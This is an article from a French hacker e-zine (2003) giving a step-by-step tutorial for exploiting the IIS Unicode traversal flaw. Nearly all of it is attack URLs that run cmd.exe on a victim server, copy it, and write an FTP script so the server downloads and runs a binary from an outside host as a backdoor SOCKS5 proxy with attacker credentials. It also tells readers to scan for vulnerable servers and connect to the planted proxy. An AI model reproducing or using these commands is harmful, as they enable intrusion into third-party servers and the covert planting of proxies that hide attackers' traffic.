TDC Mag 3

=====================================================================
3 . HACKING : LA FAILLE UNICODE comment installer un proxy a distance ( EXPLOIT TESTER ).
=====================================================================

Date : 07/05/2003
Auteur : A-bone
Sujet : Installation d'un proxy sur un serveur IIS distant .
Produit : IIS server .

Dans ce tutorial je vais presenter une technique assez peut connus , d'installation de proxy
sur un serveur IIS non patché ( failles unicodes ).

Information :
Le bug unicode a été decouvert par la société eeyes ( www.eeyes.com ), une instruction envoyée au serveur distant permet l'affichage d'un repertoire virtuel sur le serveur .
Apres l'execution de ce code voir le disque dur voullu , tel le c:\, d:\ etc .... ( comme j'ai expliquer dans le TDC Mag N°1 )

Application de la faille :

Pour trouver des serveurs Hackable par unicode rien de tel qu'un petit scaneur, telechargable partout sur internet .

Ma presentation ce porte sur une failles precise : /scripts/..%255c../winnt/system32/cmd.exe?/c+dir+c:\

Après avoir trouvé un serveur potentiel nous allons lancé la procedure instalation de notre serveur.

http://IPSERVEUR/scripts/..%255c../winnt/system32/cmd.exe?/c+dir+c:\
Avec ce type d'attaque nous arrivons directement au disque dur c:\

Le but pour nous est de creer un repertoire d'acceuil et de copier le fichier cmd.exe

- Creation du repertoire :
http://IPSERVEUR/scripts/..%255c../winnt/system32/cmd.exe?/c+mkdir+c:\test
Une erreur type cgi doit vous apparaitre,

- maintenant on copie le fichier cmd.exe vers le repertoire test .
http://IPSERVEUR/scripts/..%255c../winnt/system32/cmd.exe?/c+copy+c:\winnt\system32\cmd.exe+c:\test\cmd2.exe

la commande ci-dessous va nous permette de verifier si le fichier est bien copier cmd.exe est bien copier dans le repertoire test .
http://IPSERVEUR/scripts/..%255c../winnt/system32/cmd.exe?/c+dir+c:\test\

une fois la verification éffectué nous allons créer un fichier texte, celui-ci nous permettra de faire telecharger
au serveur distant le fichier qui nous est necessaire.

http://IPSERVEUR/scripts/..%255c../test/cmd2.exe?/c+echo+open+Serveur anonym+21>>+c:\test\1.txt
http://IPSERVEUR/scripts/..%255c../test/cmd2.exe?/c+echo+Login+>>+c:\test\1.txt
http://IPSERVEUR/scripts/..%255c../test/cmd2.exe?/c+echo+password+>>+c:\test\1.txt
http://IPSERVEUR/scripts/..%255c../test/cmd2.exe?/c+echo+get+boundll.exe+>>+c:\test\1.txt
http://IPSERVEUR/scripts/..%255c../test/cmd2.exe?/c+echo+quit+>>+c:\test\1.txt

Une fois c'est commande d'ajout de ligne dans le fichier 1.txt terminer, une petite verification s'impose.
http://IPSERVEUR/scripts/..%255c../test/cmd2.exe?/c+type+c:\test\1.txt

vous devriez voir avoir ceci :
open Serveur anonym 21
user Login
password
boundll.exe
quit

Maintenant que notre fichier text est bon nous allons lancer le telechargement du fichier.
http://IPSERVEUR/scripts/..%255c../test/cmd2.exe?/c+ftp+-i+-n+-v+-s:c:\test\1.txt

Ici si la barre de progression de chargement prend de temps a chargé c'est bon !!
Sinon ou vous avez fait une erreur ou le serveur distant est proteger par firewall.

La commande suivante permet de verifier l'upload de notre fichier

http://IPSERVEUR/scripts/..%255c../test/cmd2.exe?/c+dir+c:

Les commandes ci-dessous permettent de créer les paramettres de notre proxy, socks etc...
http://IPSERVEUR/scripts/..%255c../test/cmd2.exe?/c+dir+c:\test\boundll.exe+--port+6668+--socks5+--daemon+--s_user+A-bone+--s_password+A-bone
Ou :
http://IPSERVEUR/scripts/..%255c../test/cmd2.exe?/c+c:\inetpub\scripts\boundll.exe+--port+6668+--socks5+--daemon+--s_user+A-bone+--s_password+A-bone

Voila dans mon exmple il nous restera plus qu'a ce connecter l'ip du serveur, port 6668 avec le login et mot de pass : A-bone

Pour infos voici quelques commandes permettant le paramettrage du proxy

Exemples :

§§ Configuration 1 : "boundll.exe --port 6668 --socks5 --daemon --s_user TEST --s_password TEST"

Ceci lancera le proxy sur le port 6668 et pour l'utiliser il faudra utiliser les login/pass: TEST/TEST

§§ Configuration 2 : "boundll.exe --port 6668 --socks5 --daemon --s_user TEST --s_password Proxy --a_port 6669 --a_user admin --a_password N41r0lF

Ceci lancera le proxy avec la même configuration que la Configuration 1 mais en plus, vous pourrez gérer à distance le proxy en vous tapant: http://ip.du.proxy:6669
l'administration à distance ne se résumé qu'à deux choses:
- connaitre les ip des personnes connectées sur le proxy,leur vitesse, et à quelle ip elles sont connectées
- stopper le proxy

le ficher : boundll.exe

Malgré que les méthodes d'exploit de la failles UNICODE son multiple notre groupe DHS essaye de toujours dévoiler des nouveauté de vous faire connaître quelque chose de réel quelque chose de vrais quelque chose tester , j'espère que c'est constructif et a la prochaines :)